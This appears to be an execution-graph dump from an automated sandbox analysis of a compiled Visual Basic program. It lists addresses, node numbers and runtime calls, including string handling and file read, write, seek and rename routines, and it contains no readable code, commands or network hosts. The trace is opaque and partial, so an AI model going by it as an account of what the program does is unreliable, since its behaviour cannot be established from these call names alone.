                                                                                                                                                            execution_graph 4682 40e840 __vbaChkstk 4683 40e88a 6 API calls 4682->4683 4684 40e931 4683->4684 4685 40ea21 __vbaStrCopy 4684->4685 4686 40e951 11 API calls 4684->4686 4688 40eaa2 __vbaErrorOverflow 4684->4688 4687 40ea6e __vbaFreeStr 4685->4687 4686->4684 4689 40ae40 __vbaChkstk 4690 40ae95 __vbaAryConstruct2 __vbaOnError 4689->4690 4736 404c14 4690->4736 4737 404c1d 4736->4737 4738 40e340 4739 40e37a __vbaOnError __vbaCastObj __vbaObjSet 4738->4739 4740 40e3b8 4739->4740 4741 40e3d4 4740->4741 4742 40e3be __vbaHresultCheckObj 4740->4742 4743 40e3da __vbaFreeObj __vbaCastObj __vbaObjSet 4741->4743 4742->4743 4744 40e409 4743->4744 4745 40e41d __vbaFreeObj 4744->4745 4746 40e40f __vbaHresultCheckObj 4744->4746 4747 40e433 4745->4747 4746->4745 4748 40e447 4747->4748 4749 40e439 __vbaHresultCheckObj 4747->4749 4750 40e467 __vbaStrCopy 4748->4750 4751 40e45c __vbaHresultCheckObj 4748->4751 4749->4748 4752 40e484 4750->4752 4751->4750 4753 40e496 #519 __vbaStrMove __vbaFreeStrList __vbaFreeObj __vbaLenBstr 4752->4753 4754 40e488 __vbaHresultCheckObj 4752->4754 4755 40e505 __vbaExitProc 4753->4755 4756 40e4d9 __vbaRaiseEvent 4753->4756 4754->4753 4758 40e53c __vbaFreeStr 4755->4758 4756->4755 6007 40abc0 __vbaChkstk 6008 40ac15 __vbaOnError 6007->6008 6009 418c90 20 API calls 6008->6009 6010 40ac50 6009->6010 6011 418c90 20 API calls 6010->6011 6012 40ac75 6011->6012 4760 404843 4761 40cf70 __vbaChkstk 4760->4761 4762 40cfc5 __vbaOnError 4761->4762 4763 40d001 __vbaObjSet 4762->4763 4764 40d01f 4763->4764 4765 40d047 4764->4765 4766 40d02a __vbaHresultCheckObj 4764->4766 4767 40d741 __vbaErrorOverflow 4765->4767 4768 40d05f __vbaFreeObj 4765->4768 4766->4765 4769 40d750 __vbaChkstk 4767->4769 4781 40d080 4768->4781 4771 40d7a5 __vbaOnError 4769->4771 4770 40d144 __vbaCastObj __vbaObjSet 4773 40d173 4770->4773 4772 40f9a0 4 API calls 4771->4772 4775 40d7cb 4772->4775 4776 40d19e 4773->4776 4777 40d17e __vbaHresultCheckObj 4773->4777 4774 40d0bc __vbaObjSet 4774->4781 4778 40d7d6 #618 __vbaStrMove __vbaStrCmp __vbaFreeStr 4775->4778 4779 40e12a __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr 4775->4779 4780 40d1a8 __vbaFreeObj 4776->4780 4777->4780 4782 40d841 __vbaStrCat __vbaStrMove 4778->4782 4783 40d82a __vbaStrCopy 4778->4783 4788 40d1c7 __vbaObjSet 4780->4788 4781->4767 4781->4770 4781->4774 4785 40d0ea __vbaHresultCheckObj 4781->4785 4786 40d111 __vbaLateIdCall __vbaFreeObjList 4781->4786 4787 40d864 __vbaInStr __vbaInStr 4782->4787 4783->4787 4785->4786 4786->4781 4789 40e11d #598 4787->4789 4790 40d8ad 4787->4790 4792 40d1e5 4788->4792 4789->4779 4791 40d8cf 6 API calls 4790->4791 4796 40d8c9 __vbaSetSystemError 4790->4796 4882 404c70 4791->4882 4793 40d1f0 __vbaHresultCheckObj 4792->4793 4794 40d20d 4792->4794 4793->4794 4794->4767 4798 40d225 __vbaFreeObj 4794->4798 4796->4791 4800 40d25b 4798->4800 4803 40d390 __vbaNew __vbaObjSet 4800->4803 4804 40d26c 4800->4804 4810 40d3bd 4803->4810 4807 40d298 __vbaObjSet 4804->4807 4808 40d27c __vbaNew2 4804->4808 4824 40d2df 4807->4824 4808->4807 4814 40d3e8 4810->4814 4815 40d3c8 __vbaHresultCheckObj 4810->4815 4817 40d3f2 __vbaFreeObj 4814->4817 4815->4817 4822 40d415 4817->4822 4828 40d440 4822->4828 4829 40d420 __vbaHresultCheckObj 4822->4829 4830 40d307 4824->4830 4831 40d2ea __vbaHresultCheckObj 4824->4831 4842 40d488 4828->4842 4843 40d46b __vbaHresultCheckObj 4828->4843 4829->4828 4835 40d311 __vbaObjSet 4830->4835 4831->4835 4838 40d33f 4835->4838 4840 40d367 4838->4840 4841 40d34a __vbaHresultCheckObj 4838->4841 4844 40d371 __vbaFreeObjList 4840->4844 4841->4844 4842->4767 4846 40d49e __vbaI2I4 __vbaFreeObj 4842->4846 4843->4842 4857 40d4e9 4846->4857 4851 40d6db 4851->4767 4857->4851 4859 40d567 4857->4859 4860 40d547 __vbaHresultCheckObj 4857->4860 4862 40d571 __vbaChkstk 4859->4862 4860->4862 4864 40d5b9 4862->4864 4865 40d5ea __vbaObjSet 4864->4865 4866 40d5ca __vbaHresultCheckObj 4864->4866 4872 40d646 4865->4872 4866->4865 4874 40d651 __vbaHresultCheckObj 4872->4874 4875 40d66e 4872->4875 4878 40d678 __vbaChkstk __vbaLateIdCall __vbaFreeObjList __vbaFreeVar 4874->4878 4875->4878 4878->4767 4883 404c79 4882->4883 4884 40c843 4885 40cc42 __vbaErrorOverflow 4884->4885 4886 40c854 4884->4886 4887 40cc50 __vbaOnError 4885->4887 4888 40cc00 4886->4888 4891 40c87f __vbaObjSet 4886->4891 4889 40ccaa __vbaObjSet 4887->4889 4890 40cc9a __vbaNew2 4887->4890 4888->4885 4894 40ccdc 4889->4894 4890->4889 4893 40c89d 4891->4893 4897 40c8c5 4893->4897 4898 40c8a8 __vbaHresultCheckObj 4893->4898 4895 40ccf1 __vbaObjSet 4894->4895 4896 40cce2 __vbaHresultCheckObj 4894->4896 4899 40cd09 4895->4899 4896->4895 4897->4885 4900 40c8dd __vbaFreeObj 4897->4900 4898->4897 4901 40cd1e __vbaFreeObjList __vbaExitProc 4899->4901 4902 40cd0f __vbaHresultCheckObj 4899->4902 4903 40c8fd 4900->4903 4904 40cd56 4901->4904 4902->4901 4905 40c95c 4903->4905 4906 40c93c __vbaHresultCheckObj 4903->4906 4907 40c966 __vbaChkstk 4905->4907 4906->4907 4908 40c9ae 4907->4908 4909 40c9d6 4908->4909 4910 40c9b9 __vbaHresultCheckObj 4908->4910 4911 40c9e0 __vbaObjSet 4909->4911 4910->4911 4912 40ca18 __vbaFreeObjList 4911->4912 4913 40cbf4 4912->4913 4914 40ca47 4912->4914 4915 40ca8c 4914->4915 4916 40ca6c __vbaHresultCheckObj 4914->4916 4917 40ca96 __vbaChkstk 4915->4917 4916->4917 4918 40cade 4917->4918 4919 40cb0f __vbaObjSet 4918->4919 4920 40caef __vbaHresultCheckObj 4918->4920 4922 40cb6b 4919->4922 4920->4919 4923 40cb93 4922->4923 4924 40cb76 __vbaHresultCheckObj 4922->4924 4925 40cb9d __vbaChkstk __vbaLateIdCall __vbaFreeObjList __vbaFreeVar 4923->4925 4924->4925 4925->4913 4927 40d246 4928 40d741 __vbaErrorOverflow 4927->4928 4929 40d257 4927->4929 4930 40d750 __vbaChkstk 4928->4930 4931 40d390 __vbaNew __vbaObjSet 4929->4931 4932 40d26c 4929->4932 4933 40d7a5 __vbaOnError 4930->4933 4937 40d3bd 4931->4937 4934 40d298 __vbaObjSet 4932->4934 4935 40d27c __vbaNew2 4932->4935 4936 40f9a0 4 API calls 4933->4936 4950 40d2df 4934->4950 4935->4934 4938 40d7cb 4936->4938 4939 40d3e8 4937->4939 4940 40d3c8 __vbaHresultCheckObj 4937->4940 4941 40d7d6 #618 __vbaStrMove __vbaStrCmp __vbaFreeStr 4938->4941 4942 40e12a __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr 4938->4942 4943 40d3f2 __vbaFreeObj 4939->4943 4940->4943 4945 40d841 __vbaStrCat __vbaStrMove 4941->4945 4946 40d82a __vbaStrCopy 4941->4946 4949 40d415 4943->4949 4948 40d864 __vbaInStr __vbaInStr 4945->4948 4946->4948 4951 40e11d #598 4948->4951 4952 40d8ad 4948->4952 4953 40d440 4949->4953 4954 40d420 __vbaHresultCheckObj 4949->4954 4955 40d307 4950->4955 4956 40d2ea __vbaHresultCheckObj 4950->4956 4951->4942 4957 40d8cf 6 API calls 4952->4957 4960 40d8c9 __vbaSetSystemError 4952->4960 4966 40d488 4953->4966 4967 40d46b __vbaHresultCheckObj 4953->4967 4954->4953 4958 40d311 __vbaObjSet 4955->4958 4956->4958 4959 404c70 4957->4959 4961 40d33f 4958->4961 4962 40d93d __vbaSetSystemError __vbaRecAnsiToUni __vbaFreeStrList 4959->4962 4960->4957 4964 40d367 4961->4964 4965 40d34a __vbaHresultCheckObj 4961->4965 4962->4951 4963 40d99c __vbaStrFixstr __vbaStrMove 4962->4963 5028 40ff70 __vbaStrCopy #537 __vbaStrMove __vbaInStr __vbaFreeStr 4963->5028 4969 40d371 __vbaFreeObjList 4964->4969 4965->4969 4966->4928 4970 40d49e __vbaI2I4 __vbaFreeObj 4966->4970 4967->4966 4981 40d4e9 4970->4981 4971 40d9c9 7 API calls 4972 40e1d1 __vbaErrorOverflow 4971->4972 4973 40da8b 7 API calls 4971->4973 4992 40e1e0 4972->4992 4975 40df09 6 API calls 4973->4975 4982 40daf3 4973->4982 4974 40d6db 4974->4928 4976 40df88 __vbaChkstk #689 __vbaStrMove __vbaStrCmp __vbaFreeStr 4975->4976 4977 40e09e #598 __vbaRecUniToAnsi 4975->4977 4976->4977 4979 40e028 4976->4979 4977->4982 4978 40f8f0 4 API calls 4978->4982 4980 40e04a #580 __vbaStrToAnsi 4979->4980 4988 40e044 __vbaSetSystemError 4979->4988 4991 40e07b __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr 4979->4991 4980->4979 4981->4974 4984 40d567 4981->4984 4985 40d547 __vbaHresultCheckObj 4981->4985 4982->4977 4982->4978 4983 40e0d5 __vbaSetSystemError __vbaRecAnsiToUni 4982->4983 5034 4123c0 10 API calls 4982->5034 5246 4128b0 10 API calls 4982->5246 5262 411d10 __vbaChkstk __vbaStrCopy __vbaOnError __vbaStrCat __vbaStrMove 4982->5262 4983->4963 4987 40e107 4983->4987 4989 40d571 __vbaChkstk 4984->4989 4985->4989 4994 40e117 __vbaSetSystemError 4987->4994 4988->4980 4995 40d5b9 4989->4995 4990 40db1e __vbaStrMove __vbaStrCopy #616 __vbaStrMove 4993 40ee70 24 API calls 4990->4993 4991->4977 4996 40db68 __vbaStrMove __vbaStrCmp __vbaFreeStrList 4993->4996 4994->4951 4997 40d5ea __vbaObjSet 4995->4997 4998 40d5ca __vbaHresultCheckObj 4995->4998 4996->4982 4999 40dbbb __vbaStrCopy 4996->4999 5006 40d646 4997->5006 4998->4997 5000 40ee70 24 API calls 4999->5000 5001 40dbe3 __vbaStrMove __vbaStrCmp __vbaFreeStrList 5000->5001 5001->4982 5003 40dc2f __vbaStrCat __vbaStrMove 5001->5003 5004 40fba0 30 API calls 5003->5004 5007 40dc5f __vbaFreeStr __vbaStrCat __vbaStrMove 5004->5007 5008 40d651 __vbaHresultCheckObj 5006->5008 5009 40d66e 5006->5009 5010 415660 145 API calls 5007->5010 5012 40d678 __vbaChkstk __vbaLateIdCall __vbaFreeObjList __vbaFreeVar 5008->5012 5009->5012 5013 40dc9b __vbaFreeStr 5010->5013 5012->4928 5013->4982 5014 40dcbd __vbaStrCat __vbaStrMove #580 __vbaFreeStr #598 5013->5014 5015 40fba0 30 API calls 5014->5015 5016 40dd14 5015->5016 5017 40dd24 __vbaNew2 5016->5017 5018 40dd63 __vbaObjSet __vbaObjSet 5016->5018 5017->5016 5043 412c10 __vbaStrCopy __vbaStrCopy __vbaOnError 5018->5043 5020 40ddb4 __vbaFreeObjList #598 __vbaStrCat __vbaStrMove 5169 415d30 __vbaStrCopy __vbaStrCopy __vbaOnError __vbaStrToAnsi 5020->5169 5029 410027 __vbaStrCopy 5028->5029 5030 40ffed #537 __vbaStrMove __vbaInStr 5028->5030 5033 410053 __vbaFreeStr 5029->5033 5031 410073 __vbaErrorOverflow 5030->5031 5032 41000c #616 __vbaStrMove __vbaFreeStr 5030->5032 5032->5029 5033->4971 5035 412590 __vbaErrorOverflow 5034->5035 5036 41249c 5034->5036 5036->5035 5037 4124a5 5036->5037 5038 4124b5 7 API calls 5037->5038 5039 41252c __vbaI2I4 __vbaFileClose 5037->5039 5041 40ee70 24 API calls 5038->5041 5040 412567 __vbaFreeStr __vbaFreeStr 5039->5040 5040->4990 5042 412521 __vbaStrMove 5041->5042 5042->5039 5044 412ec1 5043->5044 5045 412e59 __vbaRecUniToAnsi __vbaStrToAnsi 5043->5045 5047 414b58 __vbaI2I4 __vbaFileClose __vbaExitProc 5044->5047 5048 412eca __vbaRecUniToAnsi __vbaStrToAnsi 5044->5048 5300 405d50 5045->5300 5049 414d3e __vbaAryDestruct __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr 5047->5049 5051 405d50 5048->5051 5049->5020 5053 412f06 __vbaSetSystemError __vbaRecAnsiToUni 5051->5053 5052 412f30 __vbaStrToUnicode __vbaFreeStr 5054 412f50 5052->5054 5053->5052 5055 412f56 __vbaHresultCheckObj 5054->5055 5056 412f68 __vbaI2I4 5054->5056 5055->5056 5057 412f7f 5056->5057 5058 412f85 __vbaHresultCheckObj 5057->5058 5059 412f97 5057->5059 5058->5059 5060 414d8a __vbaErrorOverflow 5059->5060 5061 412fd0 __vbaHresultCheckObj 5059->5061 5062 412fe2 5059->5062 5061->5062 5062->5060 5063 413018 __vbaHresultCheckObj 5062->5063 5064 41302a 5062->5064 5063->5064 5065 41303d __vbaHresultCheckObj 5064->5065 5066 41304f 5064->5066 5065->5066 5067 413073 5066->5067 5068 413064 __vbaHresultCheckObj 5066->5068 5069 413097 __vbaHresultCheckObj 5067->5069 5070 4130a9 5067->5070 5068->5067 5069->5070 5071 4130c7 __vbaSetSystemError 5070->5071 5071->5047 5072 4130e1 5071->5072 5073 4130f2 __vbaHresultCheckObj 5072->5073 5074 413104 5072->5074 5073->5074 5075 413110 __vbaSetSystemError 5074->5075 5075->5060 5076 413125 __vbaRedim 5075->5076 5076->5060 5077 41314c __vbaI2I4 5076->5077 5087 413164 5077->5087 5078 41341a 5078->5060 5079 413db2 __vbaStrCat __vbaStrMove #537 5078->5079 5081 413434 __vbaI2I4 5078->5081 5079->5060 5082 413e00 5079->5082 5080 41317f __vbaI2I4 5080->5087 5102 413440 5081->5102 5082->5060 5084 413e33 5082->5084 5085 413e3b _adj_fdiv_m64 5082->5085 5083 41350a 5083->5060 5086 413516 __vbaI2I4 5083->5086 5088 414d85 5084->5088 5089 413e6b __vbaLenBstr 5084->5089 5085->5084 5148 413528 5086->5148 5087->5060 5087->5078 5087->5080 5090 413200 __vbaHresultCheckObj 5087->5090 5120 413344 13 API calls 5087->5120 5121 4132a8 13 API calls 5087->5121 5302 414d90 5087->5302 5088->5060 5089->5088 5093 413ea0 7 API calls 5089->5093 5090->5087 5091 413c14 5091->5060 5096 413c2a __vbaI2I4 5091->5096 5092 4134bf __vbaGenerateBoundsError 5099 4134c8 __vbaStrCopy 5092->5099 5097 4144f0 5093->5097 5098 413ee8 117 API calls 5093->5098 5095 413548 __vbaI2I4 5095->5148 5128 413c38 5096->5128 5097->5047 5105 4144fa 113 API calls 5097->5105 5104 414acf 9 API calls 5098->5104 5099->5060 5099->5102 5101 414d90 5 API calls 5106 41324c __vbaI2I4 5101->5106 5102->5060 5102->5083 5102->5092 5102->5099 5103 413487 __vbaGenerateBoundsError 5102->5103 5107 41349f __vbaGenerateBoundsError 5102->5107 5103->5102 5104->5049 5105->5104 5108 414d90 5 API calls 5106->5108 5107->5102 5109 41326a __vbaI2I4 5108->5109 5109->5087 5110 4135c0 __vbaHresultCheckObj 5110->5148 5111 413cad __vbaGenerateBoundsError 5112 413cb6 __vbaStrCmp 5111->5112 5112->5128 5113 413977 __vbaGenerateBoundsError 5122 413982 __vbaStrCmp 5113->5122 5114 413687 __vbaGenerateBoundsError 5119 413692 __vbaStrCmp 5114->5119 5115 413c79 __vbaGenerateBoundsError 5115->5128 5116 413c91 __vbaGenerateBoundsError 5116->5128 5117 413d3e #537 __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStr 5117->5060 5117->5128 5118 413d29 __vbaGenerateBoundsError 5118->5128 5119->5148 5120->5087 5121->5087 5122->5148 5123 413610 __vbaGenerateBoundsError 5123->5148 5124 413900 __vbaGenerateBoundsError 5124->5148 5125 413639 _adj_fdiv_m64 5125->5148 5126 413929 _adj_fdiv_m64 5126->5148 5127 413cf5 __vbaGenerateBoundsError 5127->5128 5128->5060 5128->5079 5128->5111 5128->5112 5128->5115 5128->5116 5128->5117 5128->5118 5128->5127 5135 413d0d __vbaGenerateBoundsError 5128->5135 5313 414e80 __vbaStrCopy __vbaAryConstruct2 __vbaStrCmp 5128->5313 5129 4137f9 __vbaGenerateBoundsError 5129->5148 5130 413ae9 __vbaGenerateBoundsError 5130->5148 5131 413748 __vbaGenerateBoundsError 5134 41374d __vbaStrCopy 5131->5134 5132 413a38 __vbaGenerateBoundsError 5136 413a3d __vbaStrCopy 5132->5136 5134->5148 5135->5128 5136->5148 5137 4138b8 __vbaGenerateBoundsError 5151 413bb0 __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStr 5137->5151 5138 413654 __vbaR8IntI4 5138->5148 5149 413667 __vbaGenerateBoundsError 5138->5149 5139 413b93 __vbaGenerateBoundsError 5139->5148 5140 413944 __vbaR8IntI4 5145 413957 __vbaGenerateBoundsError 5140->5145 5140->5148 5141 413786 __vbaGenerateBoundsError 5141->5148 5142 413a76 __vbaGenerateBoundsError 5142->5148 5143 4136d5 __vbaGenerateBoundsError 5143->5148 5144 4139c5 __vbaGenerateBoundsError 5144->5148 5145->5148 5146 4137ab _adj_fdiv_m64 5146->5148 5147 4139ea _adj_fdiv_m64 5147->5148 5148->5060 5148->5088 5148->5091 5148->5095 5148->5110 5148->5113 5148->5114 5148->5119 5148->5122 5148->5123 5148->5124 5148->5125 5148->5126 5148->5129 5148->5130 5148->5131 5148->5132 5148->5134 5148->5136 5148->5137 5148->5138 5148->5139 5148->5140 5148->5141 5148->5142 5148->5143 5148->5144 5148->5146 5148->5147 5150 413a9b _adj_fdiv_m64 5148->5150 5148->5151 5152 4136fa _adj_fdiv_m64 5148->5152 5153 413b1a __vbaGenerateBoundsError 5148->5153 5154 41382a __vbaGenerateBoundsError 5148->5154 5155 413ab6 __vbaR8IntI4 5148->5155 5156 413715 __vbaR8IntI4 5148->5156 5157 413b43 _adj_fdiv_m64 5148->5157 5158 4137c6 __vbaR8IntI4 5148->5158 5159 413a05 __vbaR8IntI4 5148->5159 5160 413853 _adj_fdiv_m64 5148->5160 5165 413b5e __vbaR8IntI4 5148->5165 5166 41386e __vbaR8IntI4 5148->5166 5149->5148 5150->5148 5151->5060 5151->5148 5152->5148 5153->5148 5154->5148 5155->5148 5161 413ac9 __vbaGenerateBoundsError 5155->5161 5156->5148 5162 413728 __vbaGenerateBoundsError 5156->5162 5157->5148 5158->5148 5163 4137d9 __vbaGenerateBoundsError 5158->5163 5159->5148 5164 413a18 __vbaGenerateBoundsError 5159->5164 5160->5148 5161->5148 5162->5148 5163->5148 5164->5148 5165->5148 5167 413b75 __vbaGenerateBoundsError 5165->5167 5166->5148 5168 413885 __vbaGenerateBoundsError 5166->5168 5167->5148 5168->5148 5365 4066f4 5169->5365 5247 412c00 __vbaErrorOverflow 5246->5247 5248 41298c 5246->5248 5248->5247 5249 412b90 __vbaI2I4 __vbaFileClose 5248->5249 5250 4129a9 __vbaI2I4 __vbaFileSeek __vbaI2I4 __vbaGet3 5248->5250 5251 412bd7 __vbaFreeStr __vbaFreeStr 5249->5251 5250->5247 5252 4129f4 __vbaLenBstr 5250->5252 5251->4982 5252->5247 5253 412a07 5252->5253 5253->5249 5254 412a1b 7 API calls 5253->5254 5255 40ee70 24 API calls 5254->5255 5256 412a87 __vbaStrMove __vbaStrCopy __vbaStrMove #616 __vbaStrMove 5255->5256 5257 40ee70 24 API calls 5256->5257 5258 412add __vbaStrMove __vbaStrCmp __vbaFreeStrList 5257->5258 5258->5249 5259 412b21 5258->5259 5260 40ee70 24 API calls 5259->5260 5261 412b31 6 API calls 5260->5261 5261->5249 5263 40fba0 30 API calls 5262->5263 5264 411d9a __vbaFreeStr __vbaStrCat __vbaStrMove 5263->5264 5265 415660 145 API calls 5264->5265 5266 411dd0 __vbaFreeStr 5265->5266 5267 411df2 __vbaStrCat __vbaStrMove #580 __vbaFreeStr #598 5266->5267 5268 411ded __vbaFreeStr __vbaFreeStr 5266->5268 5269 40fba0 30 API calls 5267->5269 5268->4982 5270 411e43 5269->5270 5272 411e53 __vbaNew2 5270->5272 5273 411e6f __vbaObjSet __vbaObjSet 5270->5273 5272->5273 5275 412c10 452 API calls 5273->5275 5276 411ed4 __vbaFreeObjList #598 5275->5276 5277 411f04 5276->5277 5278 411f16 __vbaStrCat __vbaStrMove 5276->5278 5280 411f10 __vbaSetSystemError 5277->5280 5279 415d30 404 API calls 5278->5279 5281 411f43 12 API calls 5279->5281 5280->5278 5282 411ff0 8 API calls 5281->5282 5283 4123ba __vbaErrorOverflow 5281->5283 5282->5283 5284 412073 5282->5284 5284->5283 5285 412090 __vbaI2I4 __vbaFileSeek __vbaI2I4 __vbaGet3 5284->5285 5286 4122d3 __vbaI2I4 __vbaFileClose __vbaI2I4 __vbaFileClose 5284->5286 5285->5283 5287 4120db 5285->5287 5288 40fba0 30 API calls 5286->5288 5287->5286 5289 4120ef __vbaI2I4 __vbaFileSeek #525 __vbaStrMove 5287->5289 5290 412311 __vbaStrCat __vbaStrMove __vbaNameFile __vbaFreeStr #580 5288->5290 5296 412142 5289->5296 5290->5268 5291 41224c __vbaI2I4 __vbaPut3 __vbaStrCopy 5292 40ee70 24 API calls 5291->5292 5293 412287 __vbaStrMove 5292->5293 5295 40eab0 29 API calls 5293->5295 5294 412170 __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 5294->5283 5294->5296 5297 41229b __vbaStrMove __vbaI2I4 __vbaPut3 __vbaFreeStrList 5295->5297 5296->5283 5296->5291 5296->5294 5298 41223a #598 5296->5298 5299 4121e1 6 API calls 5296->5299 5297->5286 5298->5296 5299->5298 5301 405d59 5300->5301 5303 414dc2 _adj_fdiv_m64 5302->5303 5304 414dba 5302->5304 5303->5304 5305 414de2 __vbaR8IntI4 5304->5305 5306 414e40 5304->5306 5307 414df6 5305->5307 5308 414e6e __vbaErrorOverflow 5305->5308 5306->5308 5312 413228 __vbaI2I4 5306->5312 5307->5308 5309 414e13 5307->5309 5310 414e1b _adj_fdiv_m64 5307->5310 5309->5306 5311 414e32 __vbaR8IntI4 5309->5311 5310->5309 5311->5306 5311->5308 5312->5101 5314 4155f6 __vbaFreeStr __vbaFreeStr __vbaAryDestruct 5313->5314 5318 414ef4 5313->5318 5314->5117 5316 415650 __vbaErrorOverflow 5317 414f24 #631 __vbaStrMove __vbaFreeVar __vbaStrCmp 5317->5318 5318->5316 5318->5317 5320 414f77 5318->5320 5321 414f5f __vbaI2I4 5318->5321 5319 41564b 5319->5316 5320->5316 5320->5319 5323 414fcf #631 __vbaStrMove __vbaFreeVar __vbaStrCmp 5320->5323 5325 415029 5320->5325 5321->5318 5322 4150de 5322->5316 5322->5319 5328 415190 5322->5328 5329 415136 #631 __vbaStrMove __vbaFreeVar __vbaStrCmp 5322->5329 5323->5320 5324 415004 __vbaI2I4 5323->5324 5324->5320 5325->5316 5325->5319 5325->5322 5326 415084 #631 __vbaStrMove __vbaFreeVar __vbaStrCmp 5325->5326 5326->5325 5327 4150b9 __vbaI2I4 5326->5327 5327->5325 5328->5316 5328->5319 5331 415245 5328->5331 5332 4151eb #631 __vbaStrMove __vbaFreeVar __vbaStrCmp 5328->5332 5329->5322 5330 41516b __vbaI2I4 5329->5330 5330->5322 5331->5316 5331->5319 5334 4152fa 5331->5334 5336 4152a0 #631 __vbaStrMove __vbaFreeVar __vbaStrCmp 5331->5336 5332->5328 5333 415220 __vbaI2I4 5332->5333 5333->5328 5334->5316 5334->5319 5337 4153ac 5334->5337 5339 415352 #631 __vbaStrMove __vbaFreeVar __vbaStrCmp 5334->5339 5335 415461 5335->5319 5340 415495 5335->5340 5341 41549d _adj_fdiv_m32 5335->5341 5336->5331 5338 4152d5 __vbaI2I4 5336->5338 5337->5316 5337->5319 5337->5335 5343 415407 #631 __vbaStrMove __vbaFreeVar __vbaStrCmp 5337->5343 5338->5331 5339->5334 5342 415387 __vbaI2I4 5339->5342 5340->5319 5344 4154b2 __vbaFpI2 5340->5344 5341->5340 5342->5334 5343->5337 5345 41543c __vbaI2I4 5343->5345 5346 4154c5 5344->5346 5347 4154cd _adj_fdiv_m32 5344->5347 5345->5337 5346->5319 5348 4154e2 __vbaFpI2 5346->5348 5347->5346 5349 4154f5 5348->5349 5350 4154fd _adj_fdiv_m32 5348->5350 5349->5319 5351 415512 __vbaFpI2 5349->5351 5350->5349 5352 415526 5351->5352 5353 41552e _adj_fdiv_m32 5351->5353 5352->5319 5354 415543 __vbaFpI2 5352->5354 5353->5352 5355 415557 5354->5355 5356 41555f _adj_fdiv_m32 5354->5356 5355->5319 5357 415574 __vbaFpI2 5355->5357 5356->5355 5358 415590 _adj_fdiv_m32 5357->5358 5359 415588 5357->5359 5358->5359 5359->5319 5360 4155a5 __vbaFpI2 5359->5360 5361 4155c1 _adj_fdiv_m32 5360->5361 5362 4155b9 5360->5362 5361->5362 5362->5319 5363 4155d2 __vbaFpI2 5362->5363 5363->5316 5364 4155d9 5363->5364 5364->5314 5364->5316 5366 4066fd 5365->5366 5367 40f149 5368 40f158 __vbaFreeStr __vbaFreeVar 5367->5368 5369 40f14f __vbaFreeStr 5367->5369 5369->5368 5373 40a24c 5374 40abac __vbaErrorOverflow 5373->5374 5375 40a25d 5373->5375 5376 40abc0 __vbaChkstk 5374->5376 5377 40a272 __vbaStrCat __vbaStrMove 5375->5377 5378 40aa5b 5375->5378 5379 40ac15 __vbaOnError 5376->5379 5380 40f8f0 4 API calls 5377->5380 5381 40f1d0 120 API calls 5378->5381 5382 418c90 20 API calls 5379->5382 5383 40a2a0 __vbaFreeStr 5380->5383 5384 40aa6c 5381->5384 5385 40ac50 5382->5385 5386 40a329 __vbaStrCat __vbaStrMove 5383->5386 5387 40a2bb 7 API calls 5383->5387 5388 40aa7f __vbaObjSet 5384->5388 5438 40f1a0 __vbaStrCopy __vbaStrCopy 5384->5438 5389 418c90 20 API calls 5385->5389 5390 40f8f0 4 API calls 5386->5390 5387->5386 5396 40aaba 5388->5396 5397 40ac75 5389->5397 5393 40a357 __vbaFreeStr 5390->5393 5394 40a3e0 __vbaStrCat __vbaStrMove 5393->5394 5395 40a372 7 API calls 5393->5395 5398 40f8f0 4 API calls 5394->5398 5395->5394 5399 40aacb __vbaHresultCheckObj 5396->5399 5400 40aaee 5396->5400 5401 40a40e __vbaFreeStr 5398->5401 5402 40aaf8 __vbaFreeObj 5399->5402 5400->5402 5403 40a497 __vbaStrCat __vbaStrMove 5401->5403 5404 40a429 7 API calls 5401->5404 5406 40ab6f __vbaFreeStr __vbaFreeStr 5402->5406 5405 40f8f0 4 API calls 5403->5405 5404->5403 5407 40a4c5 __vbaFreeStr 5405->5407 5408 40a4e0 7 API calls 5407->5408 5409 40a54e __vbaStrCat __vbaStrMove 5407->5409 5408->5409 5410 40f8f0 4 API calls 5409->5410 5411 40a57c __vbaFreeStr 5410->5411 5412 40a605 __vbaStrCat __vbaStrMove 5411->5412 5413 40a597 7 API calls 5411->5413 5414 40f8f0 4 API calls 5412->5414 5413->5412 5415 40a633 __vbaFreeStr 5414->5415 5416 40a6bc __vbaStrCat __vbaStrMove 5415->5416 5417 40a64e 7 API calls 5415->5417 5418 40f8f0 4 API calls 5416->5418 5417->5416 5419 40a6ea __vbaFreeStr 5418->5419 5420 40a773 __vbaStrCat __vbaStrMove 5419->5420 5421 40a705 7 API calls 5419->5421 5422 40f8f0 4 API calls 5420->5422 5421->5420 5423 40a7a1 __vbaFreeStr 5422->5423 5424 40a82a __vbaStrCat __vbaStrMove 5423->5424 5425 40a7bc 7 API calls 5423->5425 5426 40f8f0 4 API calls 5424->5426 5425->5424 5427 40a858 __vbaFreeStr 5426->5427 5428 40a8e1 __vbaStrCat __vbaStrMove 5427->5428 5429 40a873 7 API calls 5427->5429 5430 40f8f0 4 API calls 5428->5430 5429->5428 5431 40a90f __vbaFreeStr 5430->5431 5432 40a998 __vbaStrCat __vbaStrMove 5431->5432 5433 40a92a 7 API calls 5431->5433 5434 40f8f0 4 API calls 5432->5434 5433->5432 5435 40a9c6 __vbaFreeStr 5434->5435 5436 40a9e1 7 API calls 5435->5436 5437 40aa4f 5435->5437 5436->5437 5438->5388 4126 407a50 __vbaChkstk 4127 407aa5 4126->4127 4128 407ad8 4127->4128 4129 407abc __vbaNew2 4127->4129 4130 407b17 __vbaHresultCheckObj 4128->4130 4131 407b3a 4128->4131 4129->4128 4130->4131 4132 407b77 __vbaHresultCheckObj 4131->4132 4133 407b9a 4131->4133 4134 407ba4 __vbaFreeObj 4132->4134 4133->4134 4135 407bd3 4134->4135 4136 407bc6 __vbaEnd 4134->4136 4137 407be3 __vbaNew2 4135->4137 4138 407bff 4135->4138 4136->4135 4137->4138 4139 407c61 4138->4139 4140 407c3e __vbaHresultCheckObj 4138->4140 4141 407c99 __vbaHresultCheckObj 4139->4141 4142 407cbc 4139->4142 4140->4139 4143 407cc6 __vbaFreeObj 4141->4143 4142->4143 4144 407ce7 4143->4144 4145 407cf8 __vbaHresultCheckObj 4144->4145 4146 407d1b 4144->4146 4145->4146 4147 407d51 4146->4147 4148 407d35 __vbaNew2 4146->4148 4149 407d90 __vbaHresultCheckObj 